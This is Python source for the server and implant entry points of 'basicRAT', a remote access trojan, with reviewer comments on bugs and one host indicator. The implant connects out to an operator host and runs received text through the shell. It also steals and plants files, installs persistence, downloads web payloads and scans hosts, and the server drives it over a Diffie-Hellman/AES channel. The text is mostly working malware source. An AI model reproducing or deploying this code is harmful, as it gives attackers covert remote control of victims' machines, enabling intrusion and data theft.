def main():
    """Operator-side entry point of the basicRAT server.

    Parses ``port`` from ``get_parser()``, binds a TCP listener on all
    interfaces, accepts exactly one client, runs the Diffie-Hellman exchange
    and then loops: read a command at the prompt, validate it against
    ``COMMANDS``, send it AES-encrypted under ``DHKEY`` and handle the reply
    for that command.

    Exits with status 1 when the bind fails and 0 on ``quit``.  ``BANNER``,
    ``COMMANDS``, ``HELP_TEXT``, ``diffiehellman``, ``AES_encrypt``,
    ``AES_decrypt``, ``recvfile`` and ``sendfile`` are defined elsewhere in
    the file and are not visible here.
    """
    parser = get_parser()
    args = vars(parser.parse_args())
    port = args['port']
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # listens on every interface, not just loopback; on failure the
        # process exits without closing the socket
        s.bind(('0.0.0.0', port))
    except socket.error:
        print 'Error: Unable to start server, port {} in use?'.format(port)
        sys.exit(1)
    for line in BANNER.split('\n'):
        # cosmetic delay between banner lines
        time.sleep(0.05)
        print line
    print 'basicRAT server listening on port {}...'.format(port)
    s.listen(10)
    # a single accept(): only the first connection is ever served, and the
    # listening socket stays open in the background
    conn, addr = s.accept()
    # NOTE(review): nothing in this function authenticates the peer before
    # or after the key exchange; whether diffiehellman() does is not
    # visible in this file
    DHKEY = diffiehellman(conn, server=True)
    while True:
        prompt = raw_input('\n[{}] basicRAT> '.format(addr[0])).rstrip()
        # allow noop
        if not prompt:
            continue
        # separate prompt into command and action
        cmd, _, action = prompt.partition(' ')
        # ensure command is valid before sending
        if cmd not in COMMANDS:
            print 'Invalid command, type "help" to see a list of commands.'
            continue
        # display help text (handled locally, nothing is sent)
        if cmd == 'help':
            print HELP_TEXT
            continue
        # send data to client
        # NOTE(review): send() is not guaranteed to write the whole
        # buffer; no length framing is visible on this channel
        conn.send(AES_encrypt(prompt, DHKEY))
        # stop server -- closes the listener only; conn is left to the OS
        if cmd == 'quit':
            s.close()
            sys.exit(0)
        # results of command
        elif cmd == 'run':
            # one recv with no framing: a reply longer than 4096 bytes is
            # truncated here and the rest is left in the stream, so the
            # next command's reply would be misread
            recv_data = conn.recv(4096)
            print AES_decrypt(recv_data, DHKEY).rstrip()
        # download a file
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                recvfile(conn, fname, DHKEY)
        # send file
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                sendfile(conn, fname, DHKEY)
        # regenerate DH key (the client is expected to do the same on
        # receiving 'rekey')
        elif cmd == 'rekey':
            DHKEY = diffiehellman(conn, server=True)
        # results of survey, persistence, unzip, or wget
        elif cmd in ['scan', 'survey', 'persistence', 'unzip', 'wget']:
            print 'Running {}...'.format(cmd)
            # same unframed single read as 'run', with a smaller buffer
            recv_data = conn.recv(1024)
            print AES_decrypt(recv_data, DHKEY)
def main():
    """Implant-side entry point of the basicRAT client.

    Connects to ``HOST``:``PORT``, runs the Diffie-Hellman exchange, then
    loops: receive one AES-encrypted command, split it into ``cmd`` and
    ``action`` and dispatch on ``cmd``.  Exits with status 0 on ``quit``;
    a ``cmd`` matching none of the branches is silently ignored.

    ``HOST``, ``PORT``, ``PLAT_TYPE``, ``diffiehellman``, ``AES_encrypt``,
    ``AES_decrypt``, ``sendfile``, ``recvfile``, ``run``, ``wget``,
    ``unzip`` and ``single_host`` are defined elsewhere in the file.
    """
    s = socket.socket()
    s.connect((HOST, PORT))
    # NOTE(review): the server is not authenticated here; whether
    # diffiehellman() does so is not visible in this file
    DHKEY = diffiehellman(s)
    while True:
        # single unframed recv; an empty read (peer closed) is not checked
        # and is passed straight to AES_decrypt
        data = s.recv(1024)
        data = AES_decrypt(data, DHKEY)
        # separate prompt into command and action
        cmd, _, action = data.partition(' ')
        # stop client
        if cmd == 'quit':
            s.close()
            sys.exit(0)
        # run command: the received text is executed through the shell
        # unchanged (shell=True).  This is the remote-code-execution path;
        # on the host the indicator is a shell spawned as a child of this
        # process
        elif cmd == 'run':
            results = subprocess.Popen(action, shell=True,
                                       stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE,
                                       stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()
            # sendall here, plain send in the other branches
            s.sendall(AES_encrypt(results, DHKEY))
        # send file
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                sendfile(s, fname, DHKEY)
        # receive file
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                recvfile(s, fname, DHKEY)
        # regenerate DH key
        elif cmd == 'rekey':
            DHKEY = diffiehellman(s)
        # apply persistence mechanism
        # NOTE(review): 'persistence' and 'survey' both call the same
        # name run(PLAT_TYPE); which module's run() that resolves to
        # depends on imports outside this view
        elif cmd == 'persistence':
            results = run(PLAT_TYPE)
            s.send(AES_encrypt(results, DHKEY))
        # download a file from the web
        elif cmd == 'wget':
            results = wget(action)
            s.send(AES_encrypt(results, DHKEY))
        # unzip a file
        elif cmd == 'unzip':
            results = unzip(action)
            s.send(AES_encrypt(results, DHKEY))
        # run system survey
        elif cmd == 'survey':
            results = run(PLAT_TYPE)
            s.send(AES_encrypt(results, DHKEY))
        # run a scan
        elif cmd == 'scan':
            results = single_host(action)
            s.send(AES_encrypt(results, DHKEY))